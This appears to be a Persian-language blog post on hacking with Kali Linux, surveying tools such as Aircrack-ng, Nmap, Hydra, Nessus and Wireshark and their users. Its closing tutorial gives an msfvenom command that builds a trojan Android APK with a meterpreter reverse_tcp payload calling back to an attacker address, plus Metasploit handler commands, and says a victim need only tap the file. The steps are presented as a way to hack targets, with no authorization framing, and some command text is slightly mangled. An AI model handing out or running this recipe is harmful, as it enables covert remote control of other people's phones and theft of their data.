چگونه با کالی لینوکس هک کنیم؟

اگر در زمینه امنیت لینوکس فعال هستید یا به تازگی قصد ورود به کار با سرور لینوکس را داشته باشید، به طور قطع نام هک با کالی لینوکس را شنیده‌اید و آن را می‌شناسید. کالی لینوکس یک سیستم متن باز برای هک است و ابزارهای مختلفی دارد که شما می‌توانید به طور رایگان از آن‌ها استفاده کنید. به همین دلیل طرفداران بسیاری دارد و هکرها و افراد درگیر در این زمینه، از آن استفاده می‌کنند. اما «تعریف دقیق کالی لینوکس چیست؟»، «مهم‌ترین ابزارهایش چه مواردی است؟» و «نحوه هک با کالی لینوکس به چه صورتی است؟».

در این مطلب قصد داریم، به این سوالات به طور دقیق پاسخ دهیم تا ابزار کالی لینوکس را بشناسید و هک با کالی لینوکس را به‌درستی یاد بگیرید.

کالی لینوکس چیست؟

کالی یک توزیع امنیتی لینوکس است که بر اساس دبیان ساخته شده است. این ابزار بیشتر برای تست نفوذ، جرم‌یابی اینترنتی و هک به کار می‌رود. کالی لینوکس شامل صدها ابزار است که این ابزارها می‌توانند تسک‌های مختلف امنیت اطلاعات مانند مهندسی معکوس، جرم‌یابی کامپیوتر، تحقیقات امنیتی، تست نفوذ و هک را به انجام برسانند. اولین نسخه این ابزار، در مارس سال 2013 رونمایی شد. کالی لینوکس در حال حاضر توسط Offensive Security حمایت مالی می‌شود.

ابزارهای کالی لینوکس

ابزارهای مختلفی زیرمجموعه کالی لینوکس هستند که شما می‌توانید از آن‌ها برای کارهای مختلف استفاده کنید. در ادامه ابزارهای مختلف را به شما معرفی می‌کنیم تا بتوانید هک با کالی لینوکس و تست‌های امنیتی را به‌راحتی با استفاده از آن انجام دهید و در این زمینه مشکلی نداشته باشید.

Aircrack-ng

Aircrack-ng، بهترین ابزار برای ارزیابی امنیت شبکه وای فای است و از آن به دلیل‌های زیر بیشتر استفاده می‌شود:

·         پایش اطلاعات: نظارت بر ارسال و دریافت داده‌های متنی از طرف افراد دیگر.

·         تشخیص حملات: برای تشخیص نقاط دسترسی جعلی به وای فای و احراز هویت افراد متصل به آن.

·         تست‌کردن: بررسی قابلیت‌های درایور وای‌فای و کارت آن.

این ابزار، command-line است و شما می‌توانید با استفاده از اسکریپت‌نویسی گسترده قابلیت‌های آن را تغییر دهید. این قابلیت توسط رابط‌های گرافیکی مختلفی به کار گرفته می‌شود. از این قابلیت می‌توانید روی Solaris, NetBSD, OpenBSD, FreeBSD, OS X, و Windows نیز استفاده کنید و به کارگیری آن تنها محدود به لینوکس نیست.

Nmap

Nmap یا Network Mapper یک ابزار رایگان بازرسی امنیتی شبکه‌های متن‌باز است و از آن می‌‎توانید هنگام هک با کالی لینوکس استفاده کنید. این ابزار از روش‌های پنهانی و فاکتورهایی مانند نوع فایروال، نوع سیستم‌عامل و سرویس‌های ارائه‌شده توسط میزبان، برای بررسی انواع هاست‌های موجود در شبکه استفاده می‌کند. بسیاری از مدیران شبکه و سیستم برای انجام وظایف زیر از آن استفاده می‌کنند:

·         تعداد سیستم‌های متصل به شبکه

·         نظارت بر در دسترس‌بودن یک سرویس یا هاست

·         بررسی مشخصات سرویس در حال اجرا

THC Hydra

ابزاری است که برای حملات بروت فورس به کار می‌رود. با استفاده از آن می‌توانید به 50 نوع پروتکل حمله کنید. این موارد شامل SMB, HTTPS, HTTP, FTP, telnet می‌شود.

Nessus

Nessus یک ابزار اسکن محسوب می‌شود که می‌توان از آن برای یافتن نقص‌های امنیتی در وب استفاده کرد. این ابزار می‌تواند نقص‌های امنیتی را جمع‌آوری کند و در مورد این آن‌ها به شما گزارش دهد.

WireShark

این ابزار به شما امکان می‌دهد تا بتوانید شبکه خودتان را به راحتی تحلیل کنید و عملکرد ترافیک شبکه را لحظه به لحظه ببینید. این مورد، یکی از مشهور‌ترین و پرکاربردترین ابزارهای تحلیل شبکه در دنیا به شمار می‌آید.

مزیت‌های استفاده از کالی لینوکس چیست؟

کالی لینوکس مزیت‌های فراوانی دارد، همین موضوع باعث می‌شود تا افراد مختلف برای انجام تست‌های نفوذ و هک آن را به کار ببرند. در ادامه این مزیت‌ها را به شما معرفی می‌کنیم تا متوجه شوید، چرا افراد هک با کالی لینوکس را انتخاب می‌کنند.

ابزارهای مختلفی دارد

شما می‌توانید با  بیش از 600 مختلف تست نفوذ و هک با کالی لینوکس را انجام دهید. به این صورت افراد در هنگام استفاده از آن کار سختی ندارند و دستشان در بررسی‌های امنیتی باز است.

OPEN SOURCE و متن باز است

کالی لینوکس یک منبع متن‌باز بسیار عالی است و GIT development tree آن برای همه افراد باز است و کد آن در دسترس کاربران اینترنت قرار دارد.

از پشتیبانی چند زبانه برخوردار است

کالی لینوکس یک تیم پشتیبانی چند زبانه دارد که به افراد اجازه می‌دهد تا با زبانی که راحت هستند کار کنند، در حالی که تمام ابزارهای هک دنیا، تنها با استفاده از زبان انگلیسی کار می‌کنند. به این صورت هکر‌ها، افسران امنیتی و دیگر افراد استفاده‌کننده از آن راحت‌تر خواهند بود.

قابلیت شخصی‌سازی کامل را دارد

شما می‌توانید به آسانی کالی لینوکس را طبق نظر خودتان شخصی‌سازی کنید و در این مسیر هیچ محدودیتی ندارید. این کمک می‌کند تا بتوانید با لذت و راحتی بیشتر از این ابزار استفاده کنید.

یادگیری هک با کالی لینوکس و استفاده از آن مناسب چه کسانی است؟

افراد و اشخاص زیادی هک با کالی لینوکس، یا تست نفوذ با آن را می‌پسندند و از آن استفاده می‌کنند، زیرا بسیار کاربردی است. در ادامه مهم‌ترین آن‌ها را به شما معرفی می‌کنیم و نحوه استفاده آن‌ها را شرح می‌دهیم تا با آن‌ها نیز آشنا شوید.

مدیران امنیتی

مدیران امنیتی مسئولیت محافظت از داده‌ها و اطلاعات شرکت و محیط خودشان را برعهده دارند. آن‌ها از کالی لینوکس برای بررسی آسیب‌پذیری‌ها استفاده می‌کنند تا بتوانند آن‌ها را به سرعت کشف و حل کنند.

مدیران شبکه

مدیران شبکه باید امنیت یک شبکه در حال اجرا را بررسی کنند. این افراد از کالی لینوکس برای شناسایی نقاط دسترسی مشکل‌دار و فراهم‌ کردن امنیت شبکه زیر نظر خودشان استفاده می‌کنند.

معماران شبکه

معماران شبکه باید معماری محیط‌های شبکه را انجام دهند و برای بررسی طرح‌های ابتدایی خودشان کالی لینوکس را به کار می‌برند. این ابزار به آن‌ها کمک می‌کند تا اطمینان پیدا کنند که چیزی به اشتباه پیکربندی نشده باشد.

افسران ارشد اطلاعات

این افراد از کالی لینوکس جهت بررسی برنامه‌های جدید نصب‌ شده روی محیط داخلی استفاده می‌کنند. همچنین این ابزار را جهت پیدا‌ کردن تنظیمات مخرب و درست‌ کردن آن‌ها به کار می‌گیرند.

مهندسان جرم‌یابی

مهندسان جرم‌یابی با استفاده از کالی لینوکس، کشف و بازیابی اطلاعات مختلف را انجام می‌دهند تا بتوانند جرم‌های احتمالی انجام‌ شده را بیابند.

هکر‌های کلاه سیاه، سفید و خاکستری

این افراد از این ابزار جهت شناخت آسیب‌پذیری‌های مختلف استفاده می‌کنند تا بتوانند از طریق آن‌ها، هک با کالی لینوکس را به انجام برسانند.

آموزش نحوه هک با کالی لینوکس

پس از بررسی مزیت‌ها و دیگر موارد مرتبط به کالی لینوکس، نوبت به آموزش نحوه هک با استفاده از آن رسیده است. در ادامه نحوه هک با کالی لینوکس را به شما آموزش می‌دهیم.

برای انجام این کار، ابتدا باید کالی لینوکس را نصب کنید، سپس باید از ترمینال لینوکس، برنامه MSFVENOM را فراخوانی کنید و سپس با استفاده از این ابزار، باید یک apk هک بسازید. چنین کاری را می‌توانید با وارد کردن دستور زیر در ترمینال لینوکس، انجام دهید:

msfvenom -p android/meterpreter/reverse_tcp LHOST=(attacker-ip-address) LPORT=(port-to-receive-connection). Name.apk

در دستور بالا به جای LHOST می‌توانید آدرس آی‌پی خودتان و به جای LPORT نام پورت اینترنتان را بنویسید. Name.apk نیز اسم ابزاری است که شما می‌سازید تا با استفاده از آن هک را انجام دهید. سپس باید دستورات زیر را به ترتیب وارد کنید تا َapk شما ساخته شود. البته این بار باید در قسمت، LHOST نام سرور را وارد کنید.

• • ·         Msf>use exploit/multi/handler
  • ·         Msf>set PAYLOAD android/meterpreter/reverse_tcp
  • ·         Msf>set LHOST 192.168.1.35
  • ·         Msf>set LPORT 443

پس از تمام‌ شدن این کار، تنها کافی است که هدف شما روی apk هک کلیک کند تا عملیات آن به طور کامل انجام شود و هک با کالی لینوکس به اتمام برسد.

جمع‌بندی

هک با کالی لینوکس، یکی از بهترین روش‌های انجام این کار به شمار می‌آید و هکرهای مختلف از این سیستم برای انجام این کار استفاده کنند. کالی لینوکس، همچنین توسط مدیران امنیت برای تست نفوذ، هک یا جرم‌یابی اینترنتی استفاده می‌شود. اما باید دقت کنید که تمامی افراد گفته‌ شده برای  استفاده درست از آن نیاز به آموزش دارند. به همین دلیل و برای کمک به شما در این مطلب، یکی از مهم‌ترین کاربردهایش، یعنی نحوه هک با کالی لینوکس را آموزش دادیم.